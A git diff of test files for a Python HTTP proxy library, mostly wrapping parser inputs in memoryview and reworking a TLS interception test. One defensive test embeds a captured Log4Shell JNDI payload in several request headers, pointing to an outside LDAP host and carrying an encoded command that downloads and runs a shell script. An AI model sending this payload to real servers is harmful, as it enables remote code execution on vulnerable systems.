CRLF.join([ b'HTTP/1.1 200 OK', + b'Content-Length: 0', CRLF, ]), ) @@ -157,6 +175,7 @@ def test_build_response(self) -> None: CRLF.join([ b'HTTP/1.1 200 OK', b'key: value', + b'Content-Length: 0', CRLF, ]), ) @@ -221,9 +240,9 @@ def test_find_line_returns_None(self) -> None: def test_connect_request_with_crlf_as_separate_chunk(self) -> None: """See https://github.com/abhinavsingh/py/issues/70 for background.""" raw = b'CONNECT pypi.org:443 HTTP/1.0\r\n' - self.parser.parse(raw) + self.parser.parse(memoryview(raw)) self.assertEqual(self.parser.state, httpParserStates.LINE_RCVD) - self.parser.parse(CRLF) + self.parser.parse(memoryview(CRLF)) self.assertEqual(self.parser.state, httpParserStates.COMPLETE) def test_get_full_parse(self) -> None: @@ -236,7 +255,7 @@ def test_get_full_parse(self) -> None: b'https://example.com/path/dir/?a=b&c=d#p=q', b'example.com', ) - self.parser.parse(pkt) + self.parser.parse(memoryview(pkt)) self.assertEqual(self.parser.total_size, len(pkt)) assert self.parser._url and self.parser._url.remainder self.assertEqual(self.parser._url.remainder, b'/path/dir/?a=b&c=d#p=q') @@ -262,7 +281,7 @@ def test_get_full_parse(self) -> None: def 
test_line_rcvd_to_rcving_headers_state_change(self) -> None: pkt = b'GET http://localhost HTTP/1.1' - self.parser.parse(pkt) + self.parser.parse(memoryview(pkt)) self.assertEqual(self.parser.total_size, len(pkt)) self.assert_state_change_with_crlf( httpParserStates.INITIALIZED, @@ -274,7 +293,7 @@ def test_get_partial_parse1(self) -> None: pkt = CRLF.join([ b'GET http://localhost:8080 HTTP/1.1', ]) - self.parser.parse(pkt) + self.parser.parse(memoryview(pkt)) self.assertEqual(self.parser.total_size, len(pkt)) self.assertEqual(self.parser.method, None) self.assertEqual(self.parser._url, None) @@ -284,7 +303,7 @@ def test_get_partial_parse1(self) -> None: httpParserStates.INITIALIZED, ) - self.parser.parse(CRLF) + self.parser.parse(memoryview(CRLF)) self.assertEqual(self.parser.total_size, len(pkt) + len(CRLF)) self.assertEqual(self.parser.method, b'GET') assert self.parser._url @@ -294,7 +313,7 @@ def test_get_partial_parse1(self) -> None: self.assertEqual(self.parser.state, httpParserStates.LINE_RCVD) host_hdr = b'Host: localhost:8080' - self.parser.parse(host_hdr) + self.parser.parse(memoryview(host_hdr)) self.assertEqual( self.parser.total_size, len(pkt) + len(CRLF) + len(host_hdr), @@ -303,7 +322,7 @@ def test_get_partial_parse1(self) -> None: self.assertEqual(self.parser.buffer, b'Host: localhost:8080') self.assertEqual(self.parser.state, httpParserStates.LINE_RCVD) - self.parser.parse(CRLF * 2) + self.parser.parse(memoryview(CRLF * 2)) self.assertEqual( self.parser.total_size, len(pkt) + (3 * len(CRLF)) + len(host_hdr), @@ -320,10 +339,12 @@ def test_get_partial_parse1(self) -> None: def test_get_partial_parse2(self) -> None: self.parser.parse( - CRLF.join([ - b'GET http://localhost:8080 HTTP/1.1', - b'Host: ', - ]), + memoryview( + CRLF.join([ + b'GET http://localhost:8080 HTTP/1.1', + b'Host: ', + ]), + ), ) self.assertEqual(self.parser.method, b'GET') assert self.parser._url @@ -333,7 +354,7 @@ def test_get_partial_parse2(self) -> None: self.assertEqual(self.parser.buffer, b'Host: ') self.assertEqual(self.parser.state, httpParserStates.LINE_RCVD) - self.parser.parse(b'localhost:8080' + CRLF) + self.parser.parse(memoryview(b'localhost:8080' + CRLF)) assert self.parser.headers self.assertEqual( self.parser.headers[b'host'], @@ -342,14 +363,14 @@ def test_get_partial_parse2(self) -> None: b'localhost:8080', ), ) - self.assertEqual(self.parser.buffer, b'') + self.assertEqual(self.parser.buffer, None) self.assertEqual( self.parser.state, httpParserStates.RCVING_HEADERS, ) - self.parser.parse(b'Content-Type: text/plain' + CRLF) - self.assertEqual(self.parser.buffer, b'') + self.parser.parse(memoryview(b'Content-Type: text/plain' + CRLF)) + self.assertEqual(self.parser.buffer, None) assert self.parser.headers self.assertEqual( self.parser.headers[b'content-type'], ( @@ -362,7 +383,7 @@ def test_get_partial_parse2(self) -> None: httpParserStates.RCVING_HEADERS, ) - self.parser.parse(CRLF) + self.parser.parse(memoryview(CRLF)) self.assertEqual(self.parser.state, httpParserStates.COMPLETE) def test_post_full_parse(self) -> None: @@ -373,7 +394,7 @@ def test_post_full_parse(self) -> None: b'Content-Type: application/x-www-form-urlencoded' + CRLF, b'a=b&c=d', ]) - self.parser.parse(raw % b'http://localhost') + self.parser.parse(memoryview(raw % b'http://localhost')) self.assertEqual(self.parser.method, b'POST') assert self.parser._url self.assertEqual(self.parser._url.hostname, b'localhost') @@ -389,7 +410,7 @@ def test_post_full_parse(self) -> None: (b'Content-Length', b'7'), ) 
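+        # With the request fully parsed, the 7 body bytes are exposed via
+        # parser.body and the internal buffer has been released.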
self.assertEqual(self.parser.body, b'a=b&c=d') - self.assertEqual(self.parser.buffer, b'') + self.assertEqual(self.parser.buffer, None) self.assertEqual(self.parser.state, httpParserStates.COMPLETE) self.assertEqual(len(self.parser.build()), len(raw % b'/')) @@ -400,19 +421,21 @@ def assert_state_change_with_crlf( final_state: int, ) -> None: self.assertEqual(self.parser.state, initial_state) - self.parser.parse(CRLF) + self.parser.parse(memoryview(CRLF)) self.assertEqual(self.parser.state, next_state) - self.parser.parse(CRLF) + self.parser.parse(memoryview(CRLF)) self.assertEqual(self.parser.state, final_state) def test_post_partial_parse(self) -> None: self.parser.parse( - CRLF.join([ - b'POST http://localhost HTTP/1.1', - b'Host: localhost', - b'Content-Length: 7', - b'Content-Type: application/x-www-form-urlencoded', - ]), + memoryview( + CRLF.join([ + b'POST http://localhost HTTP/1.1', + b'Host: localhost', + b'Content-Length: 7', + b'Content-Type: application/x-www-form-urlencoded', + ]), + ), ) self.assertEqual(self.parser.method, b'POST') assert self.parser._url @@ -425,18 +448,18 @@ def test_post_partial_parse(self) -> None: httpParserStates.HEADERS_COMPLETE, ) - self.parser.parse(b'a=b') + self.parser.parse(memoryview(b'a=b')) self.assertEqual( self.parser.state, httpParserStates.RCVING_BODY, ) self.assertEqual(self.parser.body, b'a=b') - self.assertEqual(self.parser.buffer, b'') + self.assertEqual(self.parser.buffer, None) - self.parser.parse(b'&c=d') + self.parser.parse(memoryview(b'&c=d')) self.assertEqual(self.parser.state, httpParserStates.COMPLETE) self.assertEqual(self.parser.body, b'a=b&c=d') - self.assertEqual(self.parser.buffer, b'') + self.assertEqual(self.parser.buffer, None) def test_connect_request_without_host_header_request_parse(self) -> None: """Case where clients can send CONNECT request without a Host header field. @@ -449,7 +472,7 @@ def test_connect_request_without_host_header_request_parse(self) -> None: See https://github.com/abhinavsingh/py/issues/5 for details. """ - self.parser.parse(b'CONNECT pypi.org:443 HTTP/1.0\r\n\r\n') + self.parser.parse(memoryview(b'CONNECT pypi.org:443 HTTP/1.0\r\n\r\n')) self.assertEqual(self.parser.method, httpMethods.CONNECT) self.assertEqual(self.parser.version, b'HTTP/1.0') self.assertEqual(self.parser.state, httpParserStates.COMPLETE) @@ -464,12 +487,14 @@ def test_request_parse_without_content_length(self) -> None: See https://github.com/abhinavsingh/py/issues/20 for details. """ self.parser.parse( - CRLF.join([ - b'POST http://localhost HTTP/1.1', - b'Host: localhost', - b'Content-Type: application/x-www-form-urlencoded', - CRLF, - ]), + memoryview( + CRLF.join([ + b'POST http://localhost HTTP/1.1', + b'Host: localhost', + b'Content-Type: application/x-www-form-urlencoded', + CRLF, + ]), + ), ) self.assertEqual(self.parser.method, b'POST') self.assertEqual(self.parser.state, httpParserStates.COMPLETE) @@ -490,16 +515,18 @@ def test_response_parse_without_content_length(self) -> None: pipelined responses not trigger stream close but may receive multiple responses. 
""" self.parser.type = httpParserTypes.RESPONSE_PARSER - self.parser.parse(b'HTTP/1.0 200 OK' + CRLF) + self.parser.parse(memoryview(b'HTTP/1.0 200 OK' + CRLF)) self.assertEqual(self.parser.code, b'200') self.assertEqual(self.parser.version, b'HTTP/1.0') self.assertEqual(self.parser.state, httpParserStates.LINE_RCVD) self.parser.parse( - CRLF.join([ - b'Server: BaseHTTP/0.3 Python/2.7.10', - b'Date: Thu, 13 Dec 2018 16:24:09 GMT', - CRLF, - ]), + memoryview( + CRLF.join([ + b'Server: BaseHTTP/0.3 Python/2.7.10', + b'Date: Thu, 13 Dec 2018 16:24:09 GMT', + CRLF, + ]), + ), ) self.assertEqual( self.parser.state, @@ -509,22 +536,24 @@ def test_response_parse_without_content_length(self) -> None: def test_response_parse(self) -> None: self.parser.type = httpParserTypes.RESPONSE_PARSER self.parser.parse( - b''.join([ - b'HTTP/1.1 301 Moved Permanently\r\n', - b'Location: http://www.google.com/\r\n', - b'Content-Type: text/html; charset=UTF-8\r\n', - b'Date: Wed, 22 May 2013 14:07:29 GMT\r\n', - b'Expires: Fri, 21 Jun 2013 14:07:29 GMT\r\n', - b'Cache-Control: public, max-age=2592000\r\n', - b'Server: gws\r\n', - b'Content-Length: 219\r\n', - b'X-XSS-Protection: 1; mode=block\r\n', - b'X-Frame-Options: SAMEORIGIN\r\n\r\n', - b'\n' + - b'301 Moved', - b'\n

301 Moved

\nThe document has moved\n' + - b'here.\r\n\r\n', - ]), + memoryview( + b''.join([ + b'HTTP/1.1 301 Moved Permanently\r\n', + b'Location: http://www.google.com/\r\n', + b'Content-Type: text/html; charset=UTF-8\r\n', + b'Date: Wed, 22 May 2013 14:07:29 GMT\r\n', + b'Expires: Fri, 21 Jun 2013 14:07:29 GMT\r\n', + b'Cache-Control: public, max-age=2592000\r\n', + b'Server: gws\r\n', + b'Content-Length: 219\r\n', + b'X-XSS-Protection: 1; mode=block\r\n', + b'X-Frame-Options: SAMEORIGIN\r\n\r\n', + b'\n' + + b'301 Moved', + b'\n

301 Moved

\nThe document has moved\n' + + b'here.\r\n\r\n', + ]), + ), ) self.assertEqual(self.parser.code, b'301') self.assertEqual(self.parser.reason, b'Moved Permanently') @@ -545,18 +574,20 @@ def test_response_parse(self) -> None: def test_response_partial_parse(self) -> None: self.parser.type = httpParserTypes.RESPONSE_PARSER self.parser.parse( - b''.join([ - b'HTTP/1.1 301 Moved Permanently\r\n', - b'Location: http://www.google.com/\r\n', - b'Content-Type: text/html; charset=UTF-8\r\n', - b'Date: Wed, 22 May 2013 14:07:29 GMT\r\n', - b'Expires: Fri, 21 Jun 2013 14:07:29 GMT\r\n', - b'Cache-Control: public, max-age=2592000\r\n', - b'Server: gws\r\n', - b'Content-Length: 219\r\n', - b'X-XSS-Protection: 1; mode=block\r\n', - b'X-Frame-Options: SAMEORIGIN\r\n', - ]), + memoryview( + b''.join([ + b'HTTP/1.1 301 Moved Permanently\r\n', + b'Location: http://www.google.com/\r\n', + b'Content-Type: text/html; charset=UTF-8\r\n', + b'Date: Wed, 22 May 2013 14:07:29 GMT\r\n', + b'Expires: Fri, 21 Jun 2013 14:07:29 GMT\r\n', + b'Cache-Control: public, max-age=2592000\r\n', + b'Server: gws\r\n', + b'Content-Length: 219\r\n', + b'X-XSS-Protection: 1; mode=block\r\n', + b'X-Frame-Options: SAMEORIGIN\r\n', + ]), + ), ) assert self.parser.headers self.assertEqual( @@ -567,44 +598,50 @@ def test_response_partial_parse(self) -> None: self.parser.state, httpParserStates.RCVING_HEADERS, ) - self.parser.parse(b'\r\n') + self.parser.parse(memoryview(CRLF)) self.assertEqual( self.parser.state, httpParserStates.HEADERS_COMPLETE, ) self.parser.parse( - b'\n' + - b'301 Moved', + memoryview( + b'\n' + + b'301 Moved', + ), ) self.assertEqual( self.parser.state, httpParserStates.RCVING_BODY, ) self.parser.parse( - b'\n

301 Moved

\nThe document has moved\n' + - b'here.\r\n\r\n', + memoryview( + b'\n

301 Moved

\nThe document has moved\n' + + b'here.\r\n\r\n', + ), ) self.assertEqual(self.parser.state, httpParserStates.COMPLETE) def test_chunked_response_parse(self) -> None: self.parser.type = httpParserTypes.RESPONSE_PARSER self.parser.parse( - b''.join([ - b'HTTP/1.1 200 OK\r\n', - b'Content-Type: application/json\r\n', - b'Date: Wed, 22 May 2013 15:08:15 GMT\r\n', - b'Server: gunicorn/0.16.1\r\n', - b'transfer-encoding: chunked\r\n', - b'Connection: keep-alive\r\n\r\n', - b'4\r\n', - b'Wiki\r\n', - b'5\r\n', - b'pedia\r\n', - b'E\r\n', - b' in\r\n\r\nchunks.\r\n', - b'0\r\n', - b'\r\n', - ]), + memoryview( + b''.join([ + b'HTTP/1.1 200 OK\r\n', + b'Content-Type: application/json\r\n', + b'Date: Wed, 22 May 2013 15:08:15 GMT\r\n', + b'Server: gunicorn/0.16.1\r\n', + b'transfer-encoding: chunked\r\n', + b'Connection: keep-alive\r\n\r\n', + b'4\r\n', + b'Wiki\r\n', + b'5\r\n', + b'pedia\r\n', + b'E\r\n', + b' in\r\n\r\nchunks.\r\n', + b'0\r\n', + b'\r\n', + ]), + ), ) self.assertEqual(self.parser.body, b'Wikipedia in\r\n\r\nchunks.') self.assertEqual(self.parser.state, httpParserStates.COMPLETE) @@ -633,28 +670,31 @@ def test_pipelined_chunked_response_parse(self) -> None: def assert_pipeline_response(self, response: memoryview) -> None: self.parser = HttpParser(httpParserTypes.RESPONSE_PARSER) - self.parser.parse(response.tobytes() + response.tobytes()) + self.parser.parse(memoryview(response.tobytes() + response.tobytes())) self.assertEqual(self.parser.state, httpParserStates.COMPLETE) self.assertEqual(self.parser.body, b'{"key":"value"}') self.assertEqual(self.parser.buffer, response) # parse buffer parser = HttpParser(httpParserTypes.RESPONSE_PARSER) + assert self.parser.buffer parser.parse(self.parser.buffer) self.assertEqual(parser.state, httpParserStates.COMPLETE) self.assertEqual(parser.body, b'{"key":"value"}') - self.assertEqual(parser.buffer, b'') + self.assertEqual(parser.buffer, None) def test_chunked_request_parse(self) -> None: self.parser.parse( - build_http_request( - httpMethods.POST, - b'http://example.org/', - headers={ - b'Transfer-Encoding': b'chunked', - b'Content-Type': b'application/json', - }, - body=b'f\r\n{"key":"value"}\r\n0\r\n\r\n', + memoryview( + build_http_request( + httpMethods.POST, + b'http://example.org/', + headers={ + b'Transfer-Encoding': b'chunked', + b'Content-Type': b'application/json', + }, + body=b'f\r\n{"key":"value"}\r\n0\r\n\r\n', + ), ), ) self.assertEqual(self.parser.body, b'{"key":"value"}') @@ -673,36 +713,44 @@ def test_chunked_request_parse(self) -> None: def test_is_http_1_1_keep_alive(self) -> None: self.parser.parse( - build_http_request( - httpMethods.GET, b'/', + memoryview( + build_http_request( + httpMethods.GET, b'/', + ), ), ) self.assertTrue(self.parser.is_http_1_1_keep_alive) def test_is_http_1_1_keep_alive_with_non_close_connection_header(self) -> None: self.parser.parse( - build_http_request( - httpMethods.GET, b'/', - headers={ - b'Connection': b'keep-alive', - }, + memoryview( + build_http_request( + httpMethods.GET, b'/', + headers={ + b'Connection': b'keep-alive', + }, + ), ), ) self.assertTrue(self.parser.is_http_1_1_keep_alive) def test_is_not_http_1_1_keep_alive_with_close_header(self) -> None: self.parser.parse( - build_http_request( - httpMethods.GET, b'/', - conn_close=True, + memoryview( + build_http_request( + httpMethods.GET, b'/', + conn_close=True, + ), ), ) self.assertFalse(self.parser.is_http_1_1_keep_alive) def test_is_not_http_1_1_keep_alive_for_http_1_0(self) -> None: self.parser.parse( - build_http_request( - 
httpMethods.GET, b'/', protocol_version=b'HTTP/1.0', + memoryview( + build_http_request( + httpMethods.GET, b'/', protocol_version=b'HTTP/1.0', + ), ), ) self.assertFalse(self.parser.is_http_1_1_keep_alive) @@ -713,7 +761,7 @@ def test_paramiko_doc(self) -> None: b'\r\nX-Cname-TryFiles: True\r\nX-Served: Nginx\r\nX-Deity: web02\r\nCF-Cache-Status: DYNAMIC' \ b'\r\nServer: cloudflare\r\nCF-RAY: 53f2208c6fef6c38-SJC\r\n\r\n' self.parser = HttpParser(httpParserTypes.RESPONSE_PARSER) - self.parser.parse(response) + self.parser.parse(memoryview(response)) self.assertEqual(self.parser.state, httpParserStates.COMPLETE) def test_request_factory(self) -> None: @@ -765,22 +813,24 @@ def test_proxy_protocol_not_for_response_parser(self) -> None: def test_is_safe_against_malicious_requests(self) -> None: self.parser.parse( - b'GET / HTTP/1.1\r\n' + - b'Host: 34.131.9.210:443\r\n' + - b'User-Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}:' + - b'//198.98.53.25:1389/TomcatBypass/Command/Base64d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pd' + - b'C5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOw==}\r\n' + - b'Content-Type: application/x-www-form-urlencoded\r\n' + - b'nReferer: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}:' + - b'//198.98.53.25:1389/TomcatBypass/Command/Base64d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pd' + - b'C5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOw==}\r\n' + - b'X-Api-Version: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}' + - b'://198.98.53.25:1389/TomcatBypass/Command/Base64d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pd' + - b'C5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOw==}\r\n' + - b'Cookie: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}:' + - b'//198.98.53.25:1389/TomcatBypass/Command/Base64d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pd' + - b'C5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOw==}' + - b'\r\n\r\n', + memoryview( + b'GET / HTTP/1.1\r\n' + + b'Host: 34.131.9.210:443\r\n' + + b'User-Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}:' + + b'//198.98.53.25:1389/TomcatBypass/Command/Base64d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pd' + + b'C5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOw==}\r\n' + + b'Content-Type: application/x-www-form-urlencoded\r\n' + + b'nReferer: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}:' + + b'//198.98.53.25:1389/TomcatBypass/Command/Base64d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pd' + + b'C5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOw==}\r\n' + + b'X-Api-Version: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}' + + b'://198.98.53.25:1389/TomcatBypass/Command/Base64d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pd' + + b'C5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOw==}\r\n' + + b'Cookie: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}:' + + b'//198.98.53.25:1389/TomcatBypass/Command/Base64d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pd' + + b'C5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOw==}' + + b'\r\n\r\n', + ), ) self.assertEqual( self.parser.header(b'user-agent'), @@ -814,20 +864,22 @@ def test_is_safe_against_malicious_requests(self) -> None: def test_parses_icap_protocol(self) -> None: # Ref https://datatracker.ietf.org/doc/html/rfc3507 self.parser.parse( - b'REQMOD icap://icap-server.net/server?arg=87 ICAP/1.0\r\n' + - b'Host: icap-server.net\r\n' + - b'Encapsulated: req-hdr=0, req-body=154' + - b'\r\n\r\n' + - b'POST /origin-resource/form.pl HTTP/1.1\r\n' + - b'Host: www.origin-server.com\r\n' + - b'Accept: text/html, text/plain\r\n' + - b'Accept-Encoding: 
compress\r\n' + - b'Cache-Control: no-cache\r\n' + - b'\r\n' + - b'1e\r\n' + - b'I am posting this information.\r\n' + - b'0\r\n' + - b'\r\n', + memoryview( + b'REQMOD icap://icap-server.net/server?arg=87 ICAP/1.0\r\n' + + b'Host: icap-server.net\r\n' + + b'Encapsulated: req-hdr=0, req-body=154' + + b'\r\n\r\n' + + b'POST /origin-resource/form.pl HTTP/1.1\r\n' + + b'Host: www.origin-server.com\r\n' + + b'Accept: text/html, text/plain\r\n' + + b'Accept-Encoding: compress\r\n' + + b'Cache-Control: no-cache\r\n' + + b'\r\n' + + b'1e\r\n' + + b'I am posting this information.\r\n' + + b'0\r\n' + + b'\r\n', + ), allowed_url_schemes=[b'icap'], ) self.assertEqual(self.parser.method, b'REQMOD') @@ -843,14 +895,16 @@ def test_cannot_parse_sip_protocol(self) -> None: # Our Url parser expects an integer port. with self.assertRaises(ValueError): self.parser.parse( - b'OPTIONS sip:nm SIP/2.0\r\n' + - b'Via: SIP/2.0/TCP nm;branch=foo\r\n' + - b'From: ;tag=root\r\nTo: \r\n' + - b'Call-ID: 50000\r\n' + - b'CSeq: 42 OPTIONS\r\n' + - b'Max-Forwards: 70\r\n' + - b'Content-Length: 0\r\n' + - b'Contact: \r\n' + - b'Accept: application/sdp\r\n' + - b'\r\n', + memoryview( + b'OPTIONS sip:nm SIP/2.0\r\n' + + b'Via: SIP/2.0/TCP nm;branch=foo\r\n' + + b'From: ;tag=root\r\nTo: \r\n' + + b'Call-ID: 50000\r\n' + + b'CSeq: 42 OPTIONS\r\n' + + b'Max-Forwards: 70\r\n' + + b'Content-Length: 0\r\n' + + b'Contact: \r\n' + + b'Accept: application/sdp\r\n' + + b'\r\n', + ), ) diff --git a/tests/http/proxy/test_http_proxy_tls_interception.py b/tests/http/proxy/test_http_proxy_tls_interception.py index e7e166f372..b3734ca23f 100644 --- a/tests/http/proxy/test_http_proxy_tls_interception.py +++ b/tests/http/proxy/test_http_proxy_tls_interception.py @@ -12,7 +12,7 @@ import uuid import socket import selectors -from typing import Any +from typing import Any, TypeVar import pytest from unittest import mock @@ -22,7 +22,10 @@ from proxy.http import HttpProtocolHandler, HttpClientConnection, httpMethods from proxy.http.proxy import HttpProxyPlugin from proxy.common.flag import FlagParser -from proxy.common.utils import bytes_, build_http_request +from proxy.http.parser import HttpParser +from proxy.common.utils import ( + bytes_, build_http_request, tls_interception_enabled, +) from proxy.http.responses import PROXY_TUNNEL_ESTABLISHED_RESPONSE_PKT from proxy.core.connection import TcpServerConnection from proxy.common.constants import DEFAULT_CA_FILE @@ -46,32 +49,39 @@ async def test_e2e(self, mocker: MockerFixture) -> None: self.mock_server_conn = mocker.patch( 'proxy.http.proxy.server.TcpServerConnection', ) - self.mock_ssl_context = mocker.patch('ssl.create_default_context') - self.mock_ssl_wrap = mocker.patch('ssl.wrap_socket') - self.mock_sign_csr.return_value = True self.mock_gen_csr.return_value = True self.mock_gen_public_key.return_value = True - ssl_connection = mock.MagicMock(spec=ssl.SSLSocket) - self.mock_ssl_context.return_value.wrap_socket.return_value = ssl_connection - self.mock_ssl_wrap.return_value = mock.MagicMock(spec=ssl.SSLSocket) + # Used for server side wrapping + self.mock_ssl_context = mocker.patch('ssl.create_default_context') + upstream_tls_sock = mock.MagicMock(spec=ssl.SSLSocket) + self.mock_ssl_context.return_value.wrap_socket.return_value = upstream_tls_sock + + # Used for client wrapping + self.mock_ssl_wrap = mocker.patch('ssl.wrap_socket') + client_tls_sock = mock.MagicMock(spec=ssl.SSLSocket) + self.mock_ssl_wrap.return_value = client_tls_sock + plain_connection = 
mock.MagicMock(spec=socket.socket) def mock_connection() -> Any: if self.mock_ssl_context.return_value.wrap_socket.called: - return ssl_connection + return upstream_tls_sock return plain_connection # Do not mock the original wrap method self.mock_server_conn.return_value.wrap.side_effect = \ - lambda x, y: TcpServerConnection.wrap( - self.mock_server_conn.return_value, x, y, + lambda x, y, as_non_blocking: TcpServerConnection.wrap( + self.mock_server_conn.return_value, x, y, as_non_blocking=as_non_blocking, ) type(self.mock_server_conn.return_value).connection = \ mock.PropertyMock(side_effect=mock_connection) + type(self.mock_server_conn.return_value).closed = \ + mock.PropertyMock(return_value=False) + self.fileno = 10 self._addr = ('127.0.0.1', 54382) self.flags = FlagParser.initialize( @@ -80,6 +90,11 @@ def mock_connection() -> Any: ca_signing_key_file='ca-signing-key.pem', threaded=True, ) + self.assertTrue(tls_interception_enabled(self.flags)) + # In this test we enable a mock http protocol handler plugin + # and a mock http proxy plugin. Internally, http protocol + # handler will only initialize proxy plugin as we'll never + # make any other request. self.plugin = mock.MagicMock() self.proxy_plugin = mock.MagicMock() self.flags.plugins = { @@ -96,36 +111,52 @@ def mock_connection() -> Any: self.plugin.assert_not_called() self.proxy_plugin.assert_not_called() + # Mock a CONNECT request followed by a GET request + # from client connection + headers = { + b'Host': bytes_(netloc), + } connect_request = build_http_request( httpMethods.CONNECT, bytes_(netloc), - headers={ - b'Host': bytes_(netloc), - }, + headers=headers, + no_ua=True, ) self._conn.recv.return_value = connect_request + get_request = build_http_request( + httpMethods.GET, b'/', + headers=headers, + ) + client_tls_sock.recv.return_value = get_request - async def asyncReturnBool(val: bool) -> bool: - return val + T = TypeVar('T') # noqa: N806 - # Prepare mocked HttpProtocolHandlerPlugin - # self.plugin.return_value.get_descriptors.return_value = ([], []) - # self.plugin.return_value.write_to_descriptors.return_value = asyncReturnBool(False) - # self.plugin.return_value.read_from_descriptors.return_value = asyncReturnBool(False) - # self.plugin.return_value.on_client_data.side_effect = lambda raw: raw - # self.plugin.return_value.on_request_complete.return_value = False - # self.plugin.return_value.on_response_chunk.side_effect = lambda chunk: chunk - # self.plugin.return_value.on_client_connection_close.return_value = None + async def asyncReturn(val: T) -> T: + return val # Prepare mocked HttpProxyBasePlugin - self.proxy_plugin.return_value.write_to_descriptors.return_value = \ - asyncReturnBool(False) - self.proxy_plugin.return_value.read_from_descriptors.return_value = \ - asyncReturnBool(False) + # 1. Mock descriptor mixin methods + # + # NOTE: We need multiple async result otherwise + # we will end up with cannot await on already + # awaited coroutine. + self.proxy_plugin.return_value.get_descriptors.side_effect = \ + [asyncReturn(([], [])), asyncReturn(([], []))] + self.proxy_plugin.return_value.write_to_descriptors.side_effect = \ + [asyncReturn(False), asyncReturn(False)] + self.proxy_plugin.return_value.read_from_descriptors.side_effect = \ + [asyncReturn(False), asyncReturn(False)] + # 2. 
Mock plugin lifecycle methods + self.proxy_plugin.return_value.resolve_dns.return_value = None, None self.proxy_plugin.return_value.before_upstream_connection.side_effect = lambda r: r + self.proxy_plugin.return_value.handle_client_data.side_effect = lambda r: r self.proxy_plugin.return_value.handle_client_request.side_effect = lambda r: r - self.proxy_plugin.return_value.resolve_dns.return_value = None, None + self.proxy_plugin.return_value.handle_upstream_chunk.side_effect = lambda r: r + self.proxy_plugin.return_value.on_upstream_connection_close.return_value = None + self.proxy_plugin.return_value.on_access_log.side_effect = lambda r: r + self.proxy_plugin.return_value.do_intercept.return_value = True self.mock_selector.return_value.select.side_effect = [ + # Trigger read on plain socket [( selectors.SelectorKey( fileobj=self._conn.fileno(), @@ -135,6 +166,16 @@ async def asyncReturnBool(val: bool) -> bool: ), selectors.EVENT_READ, )], + # Trigger read on encrypted socket + [( + selectors.SelectorKey( + fileobj=client_tls_sock.fileno(), + fd=client_tls_sock.fileno(), + events=selectors.EVENT_READ, + data=None, + ), + selectors.EVENT_READ, + )], ] await self.protocol_handler._run_once() @@ -150,20 +191,38 @@ async def asyncReturnBool(val: bool) -> bool: # for interception self.assertEqual( self.proxy_plugin.call_args[0][2].connection, - self.mock_ssl_wrap.return_value, - ) - - # Assert our mocked plugins invocations - # self.plugin.return_value.get_descriptors.assert_called() - # self.plugin.return_value.write_to_descriptors.assert_called_with([]) - # # on_client_data is only called after initial request has completed - # self.plugin.return_value.on_client_data.assert_not_called() - # self.plugin.return_value.on_request_complete.assert_called() - # self.plugin.return_value.read_from_descriptors.assert_called_with([ - # self._conn.fileno(), - # ]) + client_tls_sock, + ) + + # Invoked lifecycle callbacks + self.proxy_plugin.return_value.resolve_dns.assert_called_once_with( + host, port, + ) self.proxy_plugin.return_value.before_upstream_connection.assert_called() - self.proxy_plugin.return_value.handle_client_request.assert_called() + self.proxy_plugin.return_value.handle_client_request.assert_called_once() + self.proxy_plugin.return_value.do_intercept.assert_called_once() + # All the invoked lifecycle callbacks will receive the CONNECT request + # packet with / as the path + callback_request: HttpParser = \ + self.proxy_plugin.return_value.before_upstream_connection.call_args_list[0][0][0] + callback_request1: HttpParser = \ + self.proxy_plugin.return_value.handle_client_request.call_args_list[0][0][0] + callback_request2: HttpParser = \ + self.proxy_plugin.return_value.do_intercept.call_args_list[0][0][0] + self.assertEqual(callback_request.host, bytes_(host)) + self.assertEqual(callback_request.port, 443) + self.assertEqual(callback_request.header(b'Host'), headers[b'Host']) + assert callback_request._url + self.assertEqual(callback_request._url.remainder, None) + self.assertEqual(callback_request.method, httpMethods.CONNECT) + self.assertEqual(callback_request.is_https_tunnel, True) + self.assertEqual(callback_request.build(), callback_request1.build()) + self.assertEqual(callback_request.build(), callback_request2.build()) + # Lifecycle callbacks not invoked + self.proxy_plugin.return_value.handle_client_data.assert_not_called() + self.proxy_plugin.return_value.handle_upstream_chunk.assert_not_called() + self.proxy_plugin.return_value.on_upstream_connection_close.assert_not_called() 
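+        # Only the CONNECT handshake has been processed so far; no request
+        # has been proxied upstream, so no access log entry exists either.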
